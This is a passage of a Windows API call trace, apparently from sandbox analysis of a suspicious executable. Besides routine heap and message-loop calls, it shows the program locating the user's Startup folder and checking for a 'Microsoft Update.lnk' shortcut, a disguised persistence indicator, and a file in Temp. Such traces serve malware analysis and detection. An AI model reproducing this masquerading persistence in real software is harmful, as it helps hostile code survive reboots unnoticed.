| out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0260.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865268 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0260.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865040 | out: hHeap=0x2af0000) returned 1 [0260.228] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0260.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0260.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0260.229] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0260.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0260.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0260.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0260.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0260.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0260.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865268 | out: hHeap=0x2af0000) returned 1 [0260.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0260.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0260.231] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0260.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0260.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0260.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0260.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0260.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0260.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0260.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0260.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0260.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0260.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0260.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0260.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0260.232] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0260.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0260.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0260.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0260.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0260.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0260.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0260.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0260.232] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0260.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0260.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0260.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0260.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0260.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0260.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0260.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0260.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0260.233] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0260.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0260.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0260.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0260.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0260.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0260.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0260.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0260.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0260.234] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0260.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0260.234] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0260.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0260.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0260.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0260.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0260.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0260.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0260.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0260.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0260.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0260.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0260.234] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0260.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0260.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0260.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0260.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0260.235] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0260.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5c0 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0260.235] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eaef8 [0260.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0260.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0260.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0260.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0260.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0260.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0260.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0260.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0260.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0260.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0260.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaef8 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0260.236] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0260.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0260.236] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0260.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0260.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0260.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0260.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0260.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0260.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0260.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0260.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0260.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0260.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0260.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0260.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0260.237] timeGetTime () returned 0x1180de6 [0260.237] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0260.237] Sleep (dwMilliseconds=0xa) [0260.367] timeGetTime () returned 0x1180e72 [0260.367] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0260.367] Sleep (dwMilliseconds=0xa) [0260.560] timeGetTime () returned 0x1180f2e [0260.560] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0260.560] Sleep (dwMilliseconds=0xa) [0260.667] timeGetTime () returned 0x1180f9b [0260.667] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0260.667] Sleep (dwMilliseconds=0xa) [0260.752] timeGetTime () returned 0x1180fe9 [0260.752] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0260.752] Sleep (dwMilliseconds=0xa) [0260.822] timeGetTime () returned 0x1181037 [0260.822] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0260.825] TranslateMessage (lpMsg=0x8cf798) returned 0 [0260.825] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0260.828] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0260.828] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0260.829] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0260.829] Sleep (dwMilliseconds=0xa) [0260.867] timeGetTime () returned 0x1181066 [0260.867] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0260.867] Sleep (dwMilliseconds=0xa) [0260.913] timeGetTime () returned 0x1181095 [0260.913] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0260.913] Sleep (dwMilliseconds=0xa) [0260.960] timeGetTime () returned 0x11810c4 [0260.960] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0260.960] Sleep (dwMilliseconds=0xa) [0261.006] timeGetTime () returned 0x11810f3 [0261.006] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0261.006] Sleep (dwMilliseconds=0xa) [0261.055] timeGetTime () returned 0x1181122 [0261.055] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0261.055] Sleep (dwMilliseconds=0xa) [0261.100] timeGetTime () returned 0x1181151 [0261.100] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0261.100] Sleep (dwMilliseconds=0xa) [0261.147] timeGetTime () returned 0x1181180 [0261.147] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0261.147] Sleep (dwMilliseconds=0xa) [0261.195] timeGetTime () returned 0x11811ae [0261.195] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0261.195] Sleep (dwMilliseconds=0xa) [0261.243] timeGetTime () returned 0x11811dd [0261.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0261.246] HeapFree (in: 